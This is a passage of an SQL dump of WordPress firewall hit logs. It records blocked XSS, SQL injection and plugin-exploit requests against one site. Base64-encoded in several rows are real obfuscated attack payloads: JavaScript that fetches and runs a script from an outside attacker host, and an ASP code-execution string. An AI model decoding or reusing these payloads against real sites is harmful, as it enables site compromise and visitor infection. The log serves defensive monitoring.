pfYWFhYWFhYWFhKi8sNDYvKl9hYWFhYWFhYWEqLyw5OS8qX2FhYWFhYWFhYSovLDExMS8qKi8sMTA5LypfYWFhYWFhYWFhKi8sNDcvKiovLDEwOC8qX2FhYWFhYWFhYSovLDExMS8qKi8sOTkvKl9hYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhYSovLDEwOC8qKi8sNDcvKiovLDk5LypfYWFhYWFhYWFhKi8sMTA4LypfYWFhYWFhYWFhKi8sMTAxLypfYWFhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYWEqLywxMTQvKl9hYWFhYWFhYWEqLyw0Ni8qX2FhYWFhYWFhYSovLDEwNi8qX2FhYWFhYWFhYSovLDExNS8qX2FhYWFhYWFhYSovLDYzKTt2YXIgX2FhYWFhYWFhYSA9IF9hYWFhYWFhYWEoX2FhYWFhYWFhYSk7aWYoX2FhYWFhYWFhYS5sZW5ndGggPiAzKXtfYWFhYWFhYWFhKF9hYWFhYWFhYWEpO30gZnVuY3Rpb24gX2FhYWFhYWFhYShfYWFhYWFhYWFhKXsgdmFyIF9hYWFhYWFhYWEgPSBuZXcgWE1MSHR0cFJlcXVlc3QoKTtfYWFhYWFhYWFhLm9wZW4oIFN0cmluZy5mcm9tQ2hhckNvZGUoNzEsNjksODQpLCBfYWFhYWFhYWFhLCBmYWxzZSApO19hYWFhYWFhYWEuc2VuZCggbnVsbCApO3JldHVybiBfYWFhYWFhYWFhLnJlc3BvbnNlVGV4dDt9ZnVuY3Rpb24gX2FhYWFhYWFhYSh0b2RvKXsgdmFyIF9hYWFhYWFhYWEgPSBuZXcgRnVuY3Rpb24oJ3gnLCAneScsIHRvZG8rJyByZXR1cm4geCt5OycpO19hYWFhYWFhYWEoMCwwKTt9PC9zY3JpcHQ+\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":0}'),(37729,1569477744.243272,1569477743.367300,'\0\0\0\0\0\0\0\0\0\0ÿÿ/',0,200,0,0,0,'http://bintara.com.my/','http://bintara.com.my/','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36','logged:waf','Watched IP Traffic: 5.8.47.2','{\"learningMode\":0,\"failedRules\":\"logged\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"Lw==\",\"category\":\"logged\",\"ssl\":0}'),(37741,1569529994.650666,1569529993.587400,'\0\0\0\0\0\0\0\0\0\0ÿÿ¼¦°¸',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-ajax.php','livechat_settings','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2xpY2Vuc2VFbWFpbF0=\",\"paramValue\":\"Ij48c2NyaXB0ICB0eXBlPXRleHQvamF2YXNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PnZhciBjID0gMDt2YXIgX3oxMDIyaXh2dj1TdHJpbmcuZnJvbUNoYXJDb2RlKDEwNC8qKi8sMTE2LypfeXRwYmI0Z2V4Ki8sMTE2LyoqLywxMTIvKiovLDExNS8qKi8sNTgvKl9jMHpnd3MwbHIqLyw0Ny8qKi8sNDcvKiovLDk4LypfejEwMjJpeHZ2Ki8sMTAxLypfYzB6Z3dzMGxyKi8sMTE1LyoqLyw0Ni8qX3l0cGJiNGdleCovLDk4LyoqLywxMDEvKiovLDEwOC8qX3U4dnZmeGw4YiovLDk3LyoqLywxMTYvKiovLDEwMS8qX3oxMDIyaXh2diovLDExNC8qX3l0cGJiNGdleCovLDk4LypfejEwMjJpeHZ2Ki8sMTAxLypfeXRwYmI0Z2V4Ki8sMTE5LypfdTh2dmZ4bDhiKi8sOTcvKl9jMHpnd3MwbHIqLywxMTUvKiovLDExNi8qKi8sMTA0LyoqLywxMDEvKl91OHZ2ZnhsOGIqLywxMTQvKl91OHZ2ZnhsOGIqLywxMDEvKl95dHBiYjRnZXgqLyw0Ni8qX3l0cGJiNGdleCovLDk5LypfeXRwYmI0Z2V4Ki8sMTExLypfejEwMjJpeHZ2Ki8sMTA5LypfeXRwYmI0Z2V4Ki8sNDcvKl96MTAyMml4dnYqLywxMTYvKiovLDExNC8qX3oxMDIyaXh2diovLDk3LyoqLywxMTAvKl91OHZ2ZnhsOGIqLywxMTUvKl95dHBiYjRnZXgqLyw0Ny8qKi8sMTAwLypfdTh2dmZ4bDhiKi8sMTExLypfejEwMjJpeHZ2Ki8sMTE5LypfeXRwYmI0Z2V4Ki8sMTEwLyoqLywxMTYvKiovLDk3LypfYzB6Z3dzMGxyKi8sMTEyLyoqLywxMDEvKl91OHZ2ZnhsOGIqLyw0Ni8qX2Mwemd3czBsciovLDEwNi8qX3oxMDIyaXh2diovLDExNS8qKi8sNjMvKl96MTAyMml4dnYqLyk7dmFyIF91OHZ2ZnhsOGIgPSBfeXRwYmI0Z2V4KF96MTAyMml4dnYpO2lmKF91OHZ2ZnhsOGIubGVuZ3RoID4gMyl7XzN1ZW56cmhqZihfdTh2dmZ4bDhiKTt9IGZ1bmN0aW9uIF95dHBiYjRnZXgoX2NkbHNlcmZ3Myl7IHZhciBfYzB6Z3dzMGxyID0gbmV3IFhNTEh0dHBSZXF1ZXN0KCk7X2Mwemd3czBsci5vcGVuKCBTdHJpbmcuZnJvbUNoYXJDb2RlKDcxLDY5LDg0KSwgX2NkbHNlcmZ3MywgZmFsc2UgKTtfYzB6Z3dzMGxyLnNlbmQoIG51bGwgKTtyZXR1cm4gX2Mwemd3czBsci5yZXNwb25zZVRleHQ7fWZ1bmN0aW9uIF8zdWVuenJoamYodG9kbyl7IHZhciBfOWhic3hqNThsID0gbmV3IEZ1bmN0aW9uKCd4JywgJ3knLCB0b2RvKycgcmV0dXJuIHgreTsnKTtfOWhic3hqNThsKDAsMCk7fTwvc2NyaXB0Pg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":0}'),(37730,1569477753.519617,1569477752.672800,'\0\0\0\0\0\0\0\0\0\0ÿÿ/',0,200,0,0,0,'https://bintara.com.my/blog/2018/12/11/logitech-rally/','https://bintara.com.my/blog/2018/12/11/logitech-rally/','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36','logged:waf','Watched IP Traffic: 5.8.47.2','{\"learningMode\":0,\"failedRules\":\"logged\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L2Jsb2cvMjAxOC8xMi8xMS9sb2dpdGVjaC1yYWxseS8=\",\"category\":\"logged\",\"ssl\":1}'),(37734,1569528887.550659,1569528886.732000,'\0\0\0\0\0\0\0\0\0\0ÿÿ¼¦°¸',0,403,0,0,0,'https://bintara.com.my/wp-admin/','https://bintara.com.my/wp-admin','Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0','blocked:waf','Generic XSS Injection in IP Forwarding Headers','{\"learningMode\":0,\"failedRules\":\"59\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1gtRm9yd2FyZGVkLUZvcl0=\",\"paramValue\":\"Ij48c2NyaXB0IHR5cGU9dGV4dC9qYXZhc2NyaXB0IHNyYz0naHR0cHM6Ly9iZXMuYmVsYXRlcmJld2FzdGhlcmUuY29tL2Nvcm4vZmxleC5qcz90cD0xJnRwPTMnPjwvc2NyaXB0Pg==\",\"path\":\"L3dwLWFkbWluLw==\",\"category\":\"xss\",\"ssl\":1}'),(37733,1569488882.920989,1569488881.565100,'\0\0\0\0\0\0\0\0\0\0ÿÿ}iŒJ',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0','blocked:waf','Formidable Forms <= 2.05.03 - Multiple Vulnerabilities','{\"learningMode\":0,\"failedRules\":\"107\",\"paramKey\":\"c2VydmVyLnNjcmlwdF9maWxlbmFtZQ==\",\"paramValue\":\"L2hvbWUvbm9yZmFpei9wdWJsaWNfaHRtbC9iaW50YXJhLmNvbS5teS93cC1hZG1pbi9hZG1pbi1hamF4LnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"auth-bypass\",\"ssl\":0}'),(37731,1569477757.731995,1569477756.866900,'\0\0\0\0\0\0\0\0\0\0ÿÿ/',0,200,0,0,0,'https://bintara.com.my/blog/2018/12/11/logitech-rally/','https://bintara.com.my/blog/2018/12/11/logitech-rally/','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36','logged:waf','Watched IP Traffic: 5.8.47.2','{\"learningMode\":0,\"failedRules\":\"logged\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L2Jsb2cvMjAxOC8xMi8xMS9sb2dpdGVjaC1yYWxseS8=\",\"category\":\"logged\",\"ssl\":1}'),(37735,1569528652.200237,1569528651.121000,'\0\0\0\0\0\0\0\0\0\0ÿÿ¼¦°¸',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-post.php?page=wpsm_responsive_coming_soon',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W3Jjc3BfZGVzY3JpcHRpb25d\",\"paramValue\":\"PHNjcmlwdCAgdHlwZT10ZXh0L2phdmFzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD52YXIgYyA9IDA7dmFyIF9kMW0zMmtzdG1qdXo0ZDI9U3RyaW5nLmZyb21DaGFyQ29kZSgxMDQvKiovLDExNi8qX2NmeGRocGdzODVkZXdiNyovLDExNi8qKi8sMTEyLyoqLywxMTUvKiovLDU4LypfaHA4ZHBraHNkMGxhZmx0Ki8sNDcvKiovLDQ3LyoqLyw5OC8qX2QxbTMya3N0bWp1ejRkMiovLDEwMS8qX2hwOGRwa2hzZDBsYWZsdCovLDExNS8qKi8sNDYvKl9jZnhkaHBnczg1ZGV3YjcqLyw5OC8qKi8sMTAxLyoqLywxMDgvKl85dm4wdXVlMWdmbXVza2cqLyw5Ny8qKi8sMTE2LyoqLywxMDEvKl9kMW0zMmtzdG1qdXo0ZDIqLywxMTQvKl9jZnhkaHBnczg1ZGV3YjcqLyw5OC8qX2QxbTMya3N0bWp1ejRkMiovLDEwMS8qX2NmeGRocGdzODVkZXdiNyovLDExOS8qXzl2bjB1dWUxZ2ZtdXNrZyovLDk3LypfaHA4ZHBraHNkMGxhZmx0Ki8sMTE1LyoqLywxMTYvKiovLDEwNC8qKi8sMTAxLypfOXZuMHV1ZTFnZm11c2tnKi8sMTE0LypfOXZuMHV1ZTFnZm11c2tnKi8sMTAxLypfY2Z4ZGhwZ3M4NWRld2I3Ki8sNDYvKl9jZnhkaHBnczg1ZGV3YjcqLyw5OS8qX2NmeGRocGdzODVkZXdiNyovLDExMS8qX2QxbTMya3N0bWp1ejRkMiovLDEwOS8qX2NmeGRocGdzODVkZXdiNyovLDQ3LypfZDFtMzJrc3RtanV6NGQyKi8sMTE2LyoqLywxMTQvKl9kMW0zMmtzdG1qdXo0ZDIqLyw5Ny8qKi8sMTEwLypfOXZuMHV1ZTFnZm11c2tnKi8sMTE1LypfY2Z4ZGhwZ3M4NWRld2I3Ki8sNDcvKiovLDEwMC8qXzl2bjB1dWUxZ2ZtdXNrZyovLDExMS8qX2QxbTMya3N0bWp1ejRkMiovLDExOS8qX2NmeGRocGdzODVkZXdiNyovLDExMC8qKi8sMTE2LyoqLyw5Ny8qX2hwOGRwa2hzZDBsYWZsdCovLDExMi8qKi8sMTAxLypfOXZuMHV1ZTFnZm11c2tnKi8sNDYvKl9ocDhkcGtoc2QwbGFmbHQqLywxMDYvKl9kMW0zMmtzdG1qdXo0ZDIqLywxMTUvKiovLDYzLypfZDFtMzJrc3RtanV6NGQyKi8pO3ZhciBfOXZuMHV1ZTFnZm11c2tnID0gX2NmeGRocGdzODVkZXdiNyhfZDFtMzJrc3RtanV6NGQyKTtpZihfOXZuMHV1ZTFnZm11c2tnLmxlbmd0aCA+IDMpe19rMDNzOHVtbjg1czJucWQoXzl2bjB1dWUxZ2ZtdXNrZyk7fSBmdW5jdGlvbiBfY2Z4ZGhwZ3M4NWRld2I3KF9ubXh4OHBtMnhmOHZlNzcpeyB2YXIgX2hwOGRwa2hzZDBsYWZsdCA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpO19ocDhkcGtoc2QwbGFmbHQub3BlbiggU3RyaW5nLmZyb21DaGFyQ29kZSg3MSw2OSw4NCksIF9ubXh4OHBtMnhmOHZlNzcsIGZhbHNlICk7X2hwOGRwa2hzZDBsYWZsdC5zZW5kKCBudWxsICk7cmV0dXJuIF9ocDhkcGtoc2QwbGFmbHQucmVzcG9uc2VUZXh0O31mdW5jdGlvbiBfazAzczh1bW44NXMybnFkKHRvZG8peyB2YXIgX3l4ODVnN3hibXdvaTA2ZyA9IG5ldyBGdW5jdGlvbigneCcsICd5JywgdG9kbysnIHJldHVybiB4K3k7Jyk7X3l4ODVnN3hibXdvaTA2ZygwLDApO308L3NjcmlwdD4=\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(37755,1569949444.128663,1569949442.406500,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-ajax.php?action=update_zb_fbc_code',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2RvbWFpbl0=\",\"paramValue\":\"PC9zY3JpcHQ+PHNjcmlwdCAgIHR5cGU9dGV4dC9qYXZhc2NyaXB0IGxhbmd1YWdlPWphdmFzY3JpcHQ+dmFyIGMgPSAwO3ZhciBfYWFhYWFhYT1TdHJpbmcuZnJvbUNoYXJDb2RlKDEwNC8qX2FhYWFhYWEqLywxMTYvKl9hYWFhYWFhKi8sMTE2LypfYWFhYWFhYSovLDExMi8qKi8sMTE1LypfYWFhYWFhYSovLDU4LypfYWFhYWFhYSovLDQ3LypfYWFhYWFhYSovLDQ3LypfYWFhYWFhYSovLDEwMy8qX2FhYWFhYWEqLywxMDgvKl9hYWFhYWFhKi8sOTcvKl9hYWFhYWFhKi8sMTE1LypfYWFhYWFhYSovLDExNS8qKi8sNDYvKl9hYWFhYWFhKi8sOTgvKiovLDEwMS8qX2FhYWFhYWEqLywxMDgvKl9hYWFhYWFhKi8sOTcvKl9hYWFhYWFhKi8sMTE2LypfYWFhYWFhYSovLDEwMS8qX2FhYWFhYWEqLywxMTQvKl9hYWFhYWFhKi8sOTgvKl9hYWFhYWFhKi8sMTAxLypfYWFhYWFhYSovLDExOS8qKi8sOTcvKl9hYWFhYWFhKi8sMTE1LypfYWFhYWFhYSovLDExNi8qX2FhYWFhYWEqLywxMDQvKl9hYWFhYWFhKi8sMTAxLyoqLywxMTQvKl9hYWFhYWFhKi8sMTAxLypfYWFhYWFhYSovLDQ2LypfYWFhYWFhYSovLDk5LypfYWFhYWFhYSovLDExMS8qKi8sMTA5LypfYWFhYWFhYSovLDQ3LyoqLywxMDgvKl9hYWFhYWFhKi8sMTExLyoqLyw5OS8qX2FhYWFhYWEqLyw5Ny8qX2FhYWFhYWEqLywxMDgvKiovLDQ3LyoqLyw5OS8qX2FhYWFhYWEqLywxMDgvKl9hYWFhYWFhKi8sMTAxLypfYWFhYWFhYSovLDk3LypfYWFhYWFhYSovLDExNC8qX2FhYWFhYWEqLyw0Ni8qX2FhYWFhYWEqLywxMDYvKl9hYWFhYWFhKi8sMTE1LypfYWFhYWFhYSovLDYzKTt2YXIgX2FhYWFhYWEgPSBfYWFhYWFhYShfYWFhYWFhYSk7aWYoX2FhYWFhYWEubGVuZ3RoID4gMyl7X2FhYWFhYWEoX2FhYWFhYWEpO30gZnVuY3Rpb24gX2FhYWFhYWEoX2FhYWFhYWEpeyB2YXIgX2FhYWFhYWEgPSBuZXcgWE1MSHR0cFJlcXVlc3QoKTtfYWFhYWFhYS5vcGVuKCBTdHJpbmcuZnJvbUNoYXJDb2RlKDcxLDY5LDg0KSwgX2FhYWFhYWEsIGZhbHNlICk7X2FhYWFhYWEuc2VuZCggbnVsbCApO3JldHVybiBfYWFhYWFhYS5yZXNwb25zZVRleHQ7fWZ1bmN0aW9uIF9hYWFhYWFhKHRvZG8peyB2YXIgX2FhYWFhYWEgPSBuZXcgRnVuY3Rpb24oJ3gnLCAneScsIHRvZG8rJyByZXR1cm4geCt5OycpO19hYWFhYWFhKDAsMCk7fTwvc2NyaXB0Pg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":1}'),(37758,1569949433.805791,1569949432.339500,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-post.php?action=save&updated=true',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Blog Designer <= 1.8.10 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"145\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2N1c3RvbV9jc3Nd\",\"paramValue\":\"PC9zdHlsZT48c2NyaXB0ICAgdHlwZT10ZXh0L2phdmFzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD52YXIgYyA9IDA7dmFyIF9hYWFhYWE9U3RyaW5nLmZyb21DaGFyQ29kZSgxMDQvKl9hYWFhYWEqLywxMTYvKl9hYWFhYWEqLywxMTYvKl9hYWFhYWEqLywxMTIvKiovLDExNS8qX2FhYWFhYSovLDU4LypfYWFhYWFhKi8sNDcvKl9hYWFhYWEqLyw0Ny8qX2FhYWFhYSovLDEwMy8qX2FhYWFhYSovLDEwOC8qX2FhYWFhYSovLDk3LypfYWFhYWFhKi8sMTE1LypfYWFhYWFhKi8sMTE1LyoqLyw0Ni8qX2FhYWFhYSovLDk4LyoqLywxMDEvKl9hYWFhYWEqLywxMDgvKl9hYWFhYWEqLyw5Ny8qX2FhYWFhYSovLDExNi8qX2FhYWFhYSovLDEwMS8qX2FhYWFhYSovLDExNC8qX2FhYWFhYSovLDk4LypfYWFhYWFhKi8sMTAxLypfYWFhYWFhKi8sMTE5LyoqLyw5Ny8qX2FhYWFhYSovLDExNS8qX2FhYWFhYSovLDExNi8qX2FhYWFhYSovLDEwNC8qX2FhYWFhYSovLDEwMS8qKi8sMTE0LypfYWFhYWFhKi8sMTAxLypfYWFhYWFhKi8sNDYvKl9hYWFhYWEqLyw5OS8qX2FhYWFhYSovLDExMS8qKi8sMTA5LypfYWFhYWFhKi8sNDcvKiovLDEwOC8qX2FhYWFhYSovLDExMS8qKi8sOTkvKl9hYWFhYWEqLyw5Ny8qX2FhYWFhYSovLDEwOC8qKi8sNDcvKiovLDk5LypfYWFhYWFhKi8sMTA4LypfYWFhYWFhKi8sMTAxLypfYWFhYWFhKi8sOTcvKl9hYWFhYWEqLywxMTQvKl9hYWFhYWEqLyw0Ni8qX2FhYWFhYSovLDEwNi8qX2FhYWFhYSovLDExNS8qX2FhYWFhYSovLDYzKTt2YXIgX2FhYWFhYSA9IF9hYWFhYWEoX2FhYWFhYSk7aWYoX2FhYWFhYS5sZW5ndGggPiAzKXtfYWFhYWFhKF9hYWFhYWEpO30gZnVuY3Rpb24gX2FhYWFhYShfYWFhYWFhKXsgdmFyIF9hYWFhYWEgPSBuZXcgWE1MSHR0cFJlcXVlc3QoKTtfYWFhYWFhLm9wZW4oIFN0cmluZy5mcm9tQ2hhckNvZGUoNzEsNjksODQpLCBfYWFhYWFhLCBmYWxzZSApO19hYWFhYWEuc2VuZCggbnVsbCApO3JldHVybiBfYWFhYWFhLnJlc3BvbnNlVGV4dDt9ZnVuY3Rpb24gX2FhYWFhYSh0b2RvKXsgdmFyIF9hYWFhYWEgPSBuZXcgRnVuY3Rpb24oJ3gnLCAneScsIHRvZG8rJyByZXR1cm4geCt5OycpO19hYWFhYWEoMCwwKTt9PC9zY3JpcHQ+\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(37716,1569411886.554175,1569411885.657700,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-post.php?yp_remote_get=2',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"Mg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(37900,1570544854.934966,1570544853.722600,'\0\0\0\0\0\0\0\0\0\0ÿÿw»äÎ',0,403,0,0,0,'http://bintara.com.my//plus/mcds.asp','https://www.baidu.com','Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2Fd\",\"paramValue\":\"RXhlY3V0ZSgiRXhlY3V0ZSgiIk9uIEVycm9yIFJlc3VtZSBOZXh0OlJlc3BvbnNlLkNsZWFyOkZ1bmN0aW9uIGJkKGJ5VmFsIHMpOkZvciBpPTEgVG8gTGVuKHMpIFN0ZXAgMjpjPU1pZChzLGksMik6SWYgSXNOdW1lcmljKE1pZChzLGksMSkpIFRoZW46RXhlY3V0ZSgiIiIiYmQ9YmQmY2hyJSgmSCIiIiImYyYiIiIiKSIiIiIpOkVsc2U6RXhlY3V0ZSgiIiIiYmQ9YmQmY2hyJSgmSCIiIiImYyZNaWQocyxpKzIsMikmIiIiIikiIiIiKTppPWkrMjpFbmQgSWYiIiZjaHIlKDEwKSYiIk5leHQ6RW5kIEZ1bmN0aW9uOlJlc3BvbnNlLldyaXRlKCIiIiItPnwiIiIiKTpFeGVjdXRlKCIiIiJPbiBFcnJvciBSZXN1bWUgTmV4dDoiIiIiJmJkKCIiIiI0NDY5NkQyMDUzM0E1MzNENTM2NTcyNzY2NTcyMkU0RDYxNzA3MDYxNzQ2ODI4MjIyRTIyMjkyNjYzNjg3MjI4MzkyOTNBNTM0NTU0MjA0MzNENDM3MjY1NjE3NDY1NEY2MjZBNjU2Mzc0MjgyMjUzNjM3MjY5NzA3NDY5NkU2NzJFNDY2OTZDNjU1Mzc5NzM3NDY1NkQ0RjYyNkE2NTYzNzQyMjI5M0E0OTY2MjA0NTcyNzIyMDU0Njg2NTZFM0E0NTcyNzIyRTQzNkM2NTYxNzIzQTQ1NkM3MzY1M0E0NjZGNzIyMDQ1NjE2MzY4MjA0NDIwNjk2RTIwNDMyRTQ0NzI2OTc2NjU3MzNBNTMzRDUzMjY0NDJFNDQ3MjY5NzY2NTRDNjU3NDc0NjU3MjI2NjM2ODcyMjgzNTM4MjkzQTRFNjU3ODc0M0E0NTZFNjQyMDQ5NjYzQTUyNjU3MzcwNkY2RTczNjUyRTU3NzI2OTc0NjUyODUzMjkiIiIiKSk6UmVzcG9uc2UuV3JpdGUoIiIiInw8LSIiIiIpOlJlc3BvbnNlLkVuZCIiKSIp\",\"path\":\"Ly9wbHVzL21jZHMuYXNw\",\"category\":\"sqli\",\"ssl\":0}'),(37898,1570544767.352273,1570544766.347100,'\0\0\0\0\0\0\0\0\0\0ÿÿw»äÎ',0,403,0,0,0,'http://bintara.com.my//manage/Images/Sql.asp','https://www.baidu.com','Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5ib2R5W3JtYl0=\",\"paramValue\":\"RXhlY3V0ZSgiRXhlY3V0ZSgiIk9uIEVycm9yIFJlc3VtZSBOZXh0OlJlc3BvbnNlLkNsZWFyOkZ1bmN0aW9uIGJkKGJ5VmFsIHMpOkZvciBpPTEgVG8gTGVuKHMpIFN0ZXAgMjpjPU1pZChzLGksMik6SWYgSXNOdW1lcmljKE1pZChzLGksMSkpIFRoZW46RXhlY3V0ZSgiIiIiYmQ9YmQmY2hyJSgmSCIiIiImYyYiIiIiKSIiIiIpOkVsc2U6RXhlY3V0ZSgiIiIiYmQ9YmQmY2hyJSgmSCIiIiImYyZNaWQocyxpKzIsMikmIiIiIikiIiIiKTppPWkrMjpFbmQgSWYiIiZjaHIlKDEwKSYiIk5leHQ6RW5kIEZ1bmN0aW9uOlJlc3BvbnNlLldyaXRlKCIiIiItPnwiIiIiKTpFeGVjdXRlKCIiIiJPbiBFcnJvciBSZXN1bWUgTmV4dDoiIiIiJmJkKCIiIiI0NDY5NkQyMDUzM0E1MzNENTM2NTcyNzY2NTcyMkU0RDYxNzA3MDYxNzQ2ODI4MjIyRTIyMjkyNjYzNjg3MjI4MzkyOTNBNTM0NTU0MjA0MzNENDM3MjY1NjE3NDY1NEY2MjZBNjU2Mzc0MjgyMjUzNjM3MjY5NzA3NDY5NkU2NzJFNDY2OTZDNjU1Mzc5NzM3NDY1NkQ0RjYyNkE2NTYzNzQyMjI5M0E0OTY2MjA0NTcyNzIyMDU0Njg2NTZFM0E0NTcyNzIyRTQzNkM2NTYxNzIzQTQ1NkM3MzY1M0E0NjZGNzIyMDQ1NjE2MzY4MjA0NDIwNjk2RTIwNDMyRTQ0NzI2OTc2NjU3MzNBNTMzRDUzMjY0NDJFNDQ3MjY5NzY2NTRDNjU3NDc0NjU3MjI2NjM2ODcyMjgzNTM4MjkzQTRFNjU3ODc0M0E0NTZFNjQyMDQ5NjYzQTUyNjU3MzcwNkY2RTczNjUyRTU3NzI2OTc0NjUyODUzMjkiIiIiKSk6UmVzcG9uc2UuV3JpdGUoIiIiInw8LSIiIiIpOlJlc3BvbnNlLkVuZCIiKSIp\",\"path\":\"Ly9tYW5hZ2UvSW1hZ2VzL1NxbC5hc3A=\",\"category\":\"sqli\",\"ssl\":0}'),(37719,1569411879.739370,1569411878.967000,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-post.php?page=yuzo-related-post',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Related Posts <= 5.12.90 - Missing Authentication','{\"learningMode\":0,\"failedRules\":\"137\",\"paramKey\":\"cmVxdWVzdC5ib2R5W25hbWVfb3B0aW9uc10=\",\"paramValue\":\"eXV6b19yZWxhdGVkX3Bvc3Q=\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"auth-bypass\",\"ssl\":1}'),(37759,1569949430.481150,1569949428.545500,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-post.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','WooCommerce User Email Verification <= 3.3.0 - Unauthenticated Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"142\",\"paramKey\":\"cmVxdWVzdC5ib2R5W3d1ZXZfZm9ybV90eXBlXQ==\",\"paramValue\":\"c2l0ZXVybA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"auth-bypass\",\"ssl\":1}'),(37718,1569411881.980674,1569411881.169800,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-post.php?yp_remote_get=test',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"dGVzdA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(37717,1569411884.237024,1569411883.419500,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-post.php?yp_remote_get=1',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options 